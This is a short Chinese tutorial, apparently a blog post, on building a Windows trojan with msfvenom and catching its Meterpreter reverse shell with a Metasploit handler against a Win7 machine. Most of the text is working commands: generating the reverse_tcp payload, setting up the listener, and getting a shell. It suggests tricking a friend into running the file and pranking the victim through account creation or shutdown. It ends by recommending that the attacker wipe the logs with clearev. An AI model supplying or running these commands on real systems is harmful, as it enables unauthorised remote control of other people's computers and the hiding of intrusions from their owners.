远程木马生成入侵Windows
木马是之留在计算机里的后门文件,攻击者可以在预留的木马文件进行远程控制
测试环境如下
win7靶机IP地址:172.16.240.129
KALI的IP地址:192.168.17.128
利用模块:msfvenom
监听端口:6666
1.输入木马生成语句
//示范语句
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.128(攻击者的ip) lport=6666(端口号) -f exe > /root/shell.exe (这是生成在root目录下的shell.exe文件)
//演示语句
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.128 lport=6666 -f exe > /root/shell.exe
生成成功显示
2.打开msfconsole
msfconsole
3.打开监听模块
use exploit/multi/handler
4.设置攻击负载
set payload windows/meterpreter/reverse_tcp
5.设置KALI的IP地址
6.设置监听端口
set LPORT 6666
7.开始监听
exploit
8.之后把木马程序拷贝到我们的win7靶机上,双击打开(社会工程学,可以诱导一下你的好朋友,但请勿做出违法行为)
9.成功获取到权限
进入cmd控制
shell
可以开始你的表演了,创建些账户之类的,关机啊什么的稍微恶搞一下
!!!之后记得exit清楚日志操作clearve
--小顾
发表评论